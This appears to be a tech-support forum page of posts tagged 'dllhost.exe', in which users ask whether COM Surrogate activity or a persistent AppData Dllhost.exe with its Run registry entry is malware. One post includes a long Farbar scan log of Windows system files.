
Showing results for tags 'dllhost.exe'.


  1. About 2 weeks ago I downloaded an Internet Download Manager patch from a suspicious site, and after that I have been noticing the COM Surrogate process taking up about 20% of CPU usage in Task Manager. I ran Malwarebytes and it detected 2 malware: one registry item called MSDLLHelper under HKU\S-1-5-21-2376670492-3024356693-3209832367-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|MSDllHelper and a program called DLLHost.exe under C:/User/danny/Appdata/Roaming/DLL/Dllhost.exe. I have since uninstalled Internet Download Manager and quarantined the malware, but every time I boot up my PC these 2 malware show up again and I have to quarantine and delete them again. Is there any way to remove them for good and prevent them from spawning again? I understand I need to attach some logs and that the fix scripts from other posts are user specific; please assist me with the process, thanks. Screenshot is attached below.
  2. Hello, recently I've had my DLL = (Dllhost.exe *32 Surrogate) behave strangely. Though it was only one instance of DLL, it was eating up to 130,000KB (so I closed it). When looking at processes from all users in the Task Manager, I can only spot 2 instances of DLL running, one from "SERVICE" and the other from "LOCAL SERVICE" (both running at around 500KB). Both file locations lead here: "C:\Windows\SysWOW64\dllhost.exe". Is this normal behavior or might this be a virus? PS: Pardon my English.
  3. Hello, my computer seems to have a problem whenever I open my /F: folder (not /C:) to view some other folders inside the HDD. My computer begins to slow down and RAM usage slowly increases every second. From what I notice in the Task Manager, there's a process called dllhost.exe, with the description COM Surrogate, that is eating away all the RAM. To recover, I have to restart every time I open the F folder, and after that everything is okay, but I'll never touch the /F: just to avoid it. I looked around with Mr. Google and am quite confused about whether it's malware or linked to system32. Please help and thank you. Look at the picture for more info... Using Windows 7 64-bit, 16 GB of RAM.
  4. Are these duplicate files normal or a virus? I have the latest version of mbam premium and my threat scan results are zero. I also downloaded the Farbar recovery tool to my desktop and ran a scan. I have copied / pasted the content from FRST.txt below. Please advise. I'm thinking it's not normal to see these duplicate files in task manager. I can delete one but when I reboot, they all come back in multiples. Please advise
01755136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DeviceFlows.DataModel.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01738040 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01726976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Immersive.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01708544 _____ (Microsoft Corporation) C:\WINDOWS\system32\wevtsvc.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01707512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01694712 _____ (Microsoft Corporation) C:\WINDOWS\system32\winmde.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01690112 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01656320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Perception.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01656320 _____ (Microsoft Corporation) C:\WINDOWS\system32\GdiPlus.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01643008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Speech.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01637888 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01631232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Resources.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01631232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Resources.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01595904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01570680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01557296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winmde.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01556992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Immersive.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01555456 
_____ (Microsoft Corporation) C:\WINDOWS\system32\WMPDMC.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 01547264 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_health.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01534464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Graphics.Printing.3D.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01509376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01508864 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 01503032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01491968 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01472536 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfplat.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01469120 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01461200 _____ (Microsoft Corporation) C:\WINDOWS\system32\user32.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01456640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GdiPlus.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01453992 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetsrc.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01435896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\user32.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01430208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01418304 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01403392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Editing.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01388544 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Cred.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01377008 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipUp.exe 2016-09-15 
05:01 - 2016-09-15 05:01 - 01362504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmpmde.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01360456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetsrc.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01359360 _____ (Microsoft Corporation) C:\WINDOWS\system32\usercpl.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01349120 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi 2016-09-15 05:01 - 2016-09-15 05:01 - 01349120 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifinetworkmanager.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01343928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsrcsnk.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01328128 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.Http.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01316352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_fs.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01312768 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorDataService.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 01293312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMPDMC.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 01282048 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01280352 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManager.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01274712 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01267504 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01264912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01255936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01232384 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01228288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\usercpl.dll 
2016-09-15 05:01 - 2016-09-15 05:01 - 01220608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Audio.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01217880 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01217024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Audio.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01176664 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcrt4.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01170944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Speech.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01163696 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 01123360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfplat.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01107456 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01106944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_health.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01105408 _____ (Microsoft Corporation) C:\WINDOWS\system32\MiracastReceiver.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01099616 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 01082368 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01081856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01078784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Streaming.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01077760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Editing.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01071728 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetcore.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01066328 _____ (Microsoft Corporation) C:\WINDOWS\system32\pidgenx.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01066104 _____ (Microsoft 
Corporation) C:\WINDOWS\system32\mfsvr.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01062912 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01060352 _____ (Microsoft Corporation) C:\WINDOWS\system32\JpMapControl.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01052672 _____ (Microsoft Corporation) C:\WINDOWS\system32\qmgr.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01046976 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi 2016-09-15 05:01 - 2016-09-15 05:01 - 01029632 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsStore.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01014784 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblAuthManager.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01013248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.Http.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01006080 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3D12.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00996192 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi 2016-09-15 05:01 - 2016-09-15 05:01 - 00988000 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00980824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetcore.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00963584 _____ (Microsoft Corporation) C:\WINDOWS\system32\WebcamUi.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00959488 _____ (Microsoft Corporation) C:\WINDOWS\system32\modernexecserver.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00959104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00956416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00955520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00944640 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 
00942432 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.efi 2016-09-15 05:01 - 2016-09-15 05:01 - 00939872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\pidgenx.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00936960 _____ (Microsoft Corporation) C:\WINDOWS\system32\MCRecvSrc.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00936448 _____ (Microsoft Corporation) C:\WINDOWS\system32\NMAA.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00932864 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00924672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.BackgroundTransfer.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00911872 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00909312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Search.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00905216 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapControlCore.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00895488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Streaming.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00886784 _____ (Microsoft Corporation) C:\WINDOWS\system32\CPFilters.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00885824 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00884224 _____ (Microsoft Corporation) C:\WINDOWS\system32\samsrv.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00881664 _____ (Microsoft Corporation) C:\WINDOWS\system32\authui.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00873472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00866816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Cred.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00860672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00857440 _____ (Microsoft Corporation) 
C:\WINDOWS\system32\WWAHost.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00853344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManager.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00846560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00846336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WebcamUi.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00838144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\JpMapControl.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00822784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00820736 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingOnlineServices.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00811416 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFCaptureEngine.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00807776 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00806912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3D12.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00805888 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9diag.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00804864 _____ (Microsoft Corporation) C:\WINDOWS\system32\FrameServer.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00798208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\authui.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00795648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MiracastReceiver.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00790760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpcrt4.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00782176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00781824 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneService.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00775168 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00773200 _____ 
(Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00770048 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00764936 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00761344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NMAA.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00758784 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00755656 _____ (Microsoft Corporation) C:\WINDOWS\system32\evr.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00755200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00751104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.BackgroundTransfer.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00743424 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00726016 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00717824 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00715264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapControlCore.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00715264 _____ (Microsoft Corporation) C:\WINDOWS\system32\clusapi.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00714240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00711680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Search.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00709120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CPFilters.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00691712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00681304 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ClipSp.sys 2016-09-15 05:01 - 
2016-09-15 05:01 - 00678912 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneProviders.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00674304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00665768 _____ (Microsoft Corporation) C:\WINDOWS\system32\GenValObj.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00658272 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00650240 _____ (Microsoft) C:\WINDOWS\system32\DbgModel.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00642048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.InkControls.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00640976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\evr.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00640000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MCRecvSrc.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00635904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9diag.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00627200 _____ (Microsoft Corporation) C:\WINDOWS\system32\uReFS.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00619368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00611328 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Graphics.Printing.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00605184 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcastdvr.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00601200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00595488 _____ (Microsoft Corporation) C:\WINDOWS\system32\mf.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00592384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GamePanel.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00590952 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00590848 _____ (Microsoft Corporation) 
C:\WINDOWS\system32\vbscript.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00587968 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00584544 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncHost.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00575488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\qdvd.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00568832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Speech.UXRes.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00568832 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Speech.UXRes.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00558080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\clusapi.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00554496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StoreAgent.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00552288 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00544768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\uReFS.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00540160 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSync.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00539136 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00538112 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppcext.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00536576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingOnlineServices.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00529928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mf.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00526848 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneDriveSettingSyncProvider.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00523712 _____ (Microsoft Corporation) C:\WINDOWS\system32\DMRServer.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00521728 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll 2016-09-15 05:01 - 
2016-09-15 05:01 - 00520192 _____ (Microsoft Corporation) C:\WINDOWS\system32\w32time.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00509952 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Bluetooth.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00509792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncHost.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00508416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00500224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Graphics.Printing.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00498688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LogonController.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00495104 _____ (Microsoft Corporation) C:\WINDOWS\system32\DataSenseHandlers.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00491520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcastdvr.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00484584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00484352 _____ (Microsoft Corporation) C:\WINDOWS\system32\MDEServer.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00483840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00476672 _____ (Microsoft Corporation) C:\WINDOWS\system32\schannel.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00471552 _____ (Microsoft Corporation) C:\WINDOWS\system32\DscCore.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00468992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.InkControls.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00468992 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwanconn.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00466432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sppcext.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00462336 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansec.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00461312 _____ (Microsoft) 
C:\WINDOWS\SysWOW64\DbgModel.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00461312 _____ (Microsoft Corporation) C:\WINDOWS\system32\CredProvDataModel.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00458752 _____ (Microsoft Corporation) C:\WINDOWS\system32\RTMediaFrame.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00450392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00447488 _____ (Microsoft Corporation) C:\WINDOWS\system32\das.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00446464 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapConfiguration.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00444416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSync.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00442368 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToDevice.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00438784 _____ (Microsoft Corporation) C:\WINDOWS\system32\EncDec.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00435040 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rdbss.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00432128 _____ (Microsoft Corporation) 